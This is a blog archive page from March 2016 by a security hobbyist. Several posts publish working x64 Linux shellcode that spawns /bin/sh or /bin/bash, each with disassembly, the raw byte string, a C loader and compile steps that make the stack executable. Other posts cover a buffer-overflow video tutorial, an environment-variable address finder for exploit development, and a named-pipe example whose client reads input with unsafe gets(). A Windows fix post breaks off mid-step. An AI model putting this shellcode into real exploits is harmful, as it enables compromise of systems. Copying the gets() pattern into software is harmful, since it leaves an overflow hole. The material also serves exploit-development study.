March 2016

Monday 28 March 2016

Linux/x86_x64 - execve(/bin/bash) - 33 bytes

Ajith KP March 28, 2016

Hi GuyZ,
You can find it from: https://www.exploit-db.com/exploits/39625/

Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - execve(/bin/bash) - 33 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 0b                 jmp    0x40008d
  400082: 5f                    pop    rdi
  400083: 48 31 d2              xor    rdx,rdx
  400086: 52                    push   rdx
  400087: 5e                    pop    rsi
  400088: 6a 3b                 push   0x3b
  40008a: 58                    pop    rax
  40008b: 0f 05                 syscall
  40008d: e8 f0 ff ff ff        call   0x400082
  400092: 2f                    (bad)
  400093: 2f                    (bad)
  400094: 2f                    (bad)
  400095: 2f                    (bad)
  400096: 62                    (bad)
  400097: 69 6e 2f 2f 2f 2f 2f  imul   ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f
  40009e: 62                    .byte 0x62
  40009f: 61                    (bad)
  4000a0: 73 68                 jae    0x40010a
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bash_shell bash_shell.c
$ execstack -s bash_shell
$ ./bash_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}

Saturday 26 March 2016

Programming Languages Theory

Linux/x86_x64 - execve(/bin/sh) - 25 bytes

Ajith KP March 26, 2016

Hi GuyZ,
You can find it from: http://0day.today/exploit/25119

Source Code

/*
---------------------------------------------------------------------------------------------------

Linux/x86_x64 - execve(/bin/sh) - 25 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: eb 0b                 jmp    0x40008d
  400082: 5f                    pop    rdi
  400083: 48 31 d2              xor    rdx,rdx
  400086: 52                    push   rdx
  400087: 5e                    pop    rsi
  400088: 6a 3b                 push   0x3b
  40008a: 58                    pop    rax
  40008b: 0f 05                 syscall
  40008d: e8 f0 ff ff ff        call   0x400082
  400092: 2f                    (bad)
  400093: 62                    (bad)
  400094: 69                    .byte 0x69
  400095: 6e                    outs   dx,BYTE PTR ds:[rsi]
  400096: 2f                    (bad)
  400097: 73 68                 jae    0x400101
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}

Thursday 24 March 2016

x64

Buffer Overflow exploitation in Kali Linux x64 Video Tutorial

Ajith KP March 24, 2016

Hello GuyZ,
After a long break, I have created another tutorial on Buffer Overflow exploitation. The previous exploitation tutorials are,
Part 1: http://terminalcoders.blogspot.com/2015/08/simple-buffer-overflow-attack-with.html
Part 2: http://terminalcoders.blogspot.com/2015/09/simple-buffer-overflow-attack-with.html

Image from: wonderhowto.com

The above tutorials are exploiting Windows Buffer Overflow vulnerabilities using sample application `Cool Player`, Immunity Debugger and Python.

But here, the exploiting Linux x84_64 version (64bit). There is no difference in the exploitation steps, but the registers are different in x84 and x64 versions. Also, the size of register memory are different. The tutorial uses Peda debugger, which is an extension of GDB(Gnu Debugger). You can understand how to use Peda debugger from this tutorial.

Video

x64

Linux/x86_x64 - execve(/bin/sh) - 26 bytes

Ajith KP March 24, 2016

Hi GuyZ,
After a long break, I have coded an shellcode. Unlike last times, this time it was on x64 Linux.
You can find it from: http://0day.today/exploit/25114 , https://www.exploit-db.com/exploits/39617/

Source Code

/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_x64 - execve(/bin/sh) - 26 bytes
 
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
 
0000000000400080 <.text>:
  400080:   eb 0b                   jmp    0x40008d
  400082:   5f                      pop    %rdi
  400083:   48 31 d2                xor    %rdx,%rdx
  400086:   48 89 d6                mov    %rdx,%rsi
  400089:   b0 3b                   mov    $0x3b,%al
  40008b:   0f 05                   syscall
  40008d:   e8 f0 ff ff ff          callq  0x400082
  400092:   2f                      (bad)
  400093:   2f                      (bad)
  400094:   62                      (bad)
  400095:   69                      .byte 0x69
  400096:   6e                      outsb  %ds:(%rsi),(%dx)
  400097:   2f                      (bad)
  400098:   73 68                   jae    0x400102
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) sh;
    (int)(*func)();
}

Shellcode

Environment Variable Addresse Finder for Linux

Ajith KP March 24, 2016

Hi GuyZ,
This is a useful tool which you have to need in Buffer Overflow vulnerability exploitation and exploit development. I got this tool from here.

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char *ptr;

 if(argc < 3) {
  printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
  exit(0);
 }
 ptr = getenv(argv[1]); /* get env var location */
 ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
 printf("%s will be at %p\n", argv[1], ptr);
}

Programming Languages Theory

Named Pipes (FIFO): In Linux for Interprocess Communication

Ajith KP March 24, 2016

Hello GuyZ,
Named pipes or FIFO are communication media between processes of different ancestry. Named pipes exist as a device special file in the file system. When all I/O is done by sharing processes, the named pipe remains in the file system for later use. Here, the processes are,

Client - which send data to server
Server - Retrieve data from client and process it, and send back result

Here the server process will retrieve the string send by client and convert it to capital letter and send back to client.

Code of Client

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
/*
 [*] Ajith Kp [@ajithkp560]
 [*] http://www.terminalcoders.blogspot.com
*/
int main(int argc, char const *argv[]) {
    int rd, wr, n;
    char buff[1024];
    printf("Enter data to send: ");
    gets(buff);
    wr = open("input", O_WRONLY);
    rd = open("output", O_RDONLY);
    write(wr, buff, strlen(buff));
    read(rd, buff, 1024);
    printf("Uppercase Data: %s\n", buff);
    return 0;
}

Code of Server

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <ctype.h>
/*
 [*] Ajith Kp [@ajithkp560]
 [*] http://www.terminalcoders.blogspot.com
*/
int main(int argc, char const *argv[]) {
    int rd, wr;
    char buff[1024];
    mkfifo("input", 0666);
    mkfifo("output", 0666);
    rd = open("input", O_RDONLY);
    wr = open("output", O_WRONLY);
    read(rd, buff, 1024);
    for(int i=0;i<strlen(buff);i++){
        buff[i] = toupper(buff[i]);
    }
    write(wr, buff, strlen(buff)+1);
    return 0;
}

Pic 1: Named pipe server waits for data and Named pipe client asks user input

Pic 2: Named pipe server got the data input by user from client and return the result to client

Monday 14 March 2016

Windows

Google Chrome freezes Desktop: An easy solution

Ajith KP March 14, 2016

Hi GuyZ,
Few days before, I have installed RealTek sound along with some other drivers in my DELL Inspiron laptop. After that, when I open Google Chrome my desktop freezes and only the Google Chrome runs. I wasn't able to do anything other than browse using Chrome or open Task Manager and close the Chrome browser.

After close the Google Chrome, the desktop behaves normally. I have Googleized the problem and got too many solutions including deleting the Google Chrome user files, disabling plugins(including Flash Player plugin), etc. But none of these worked. So, at last I got a solution that, reset the Windows's `WINSOCK`.
To reset the winsock, you have to open a Command Prompt as Administrator. The steps are,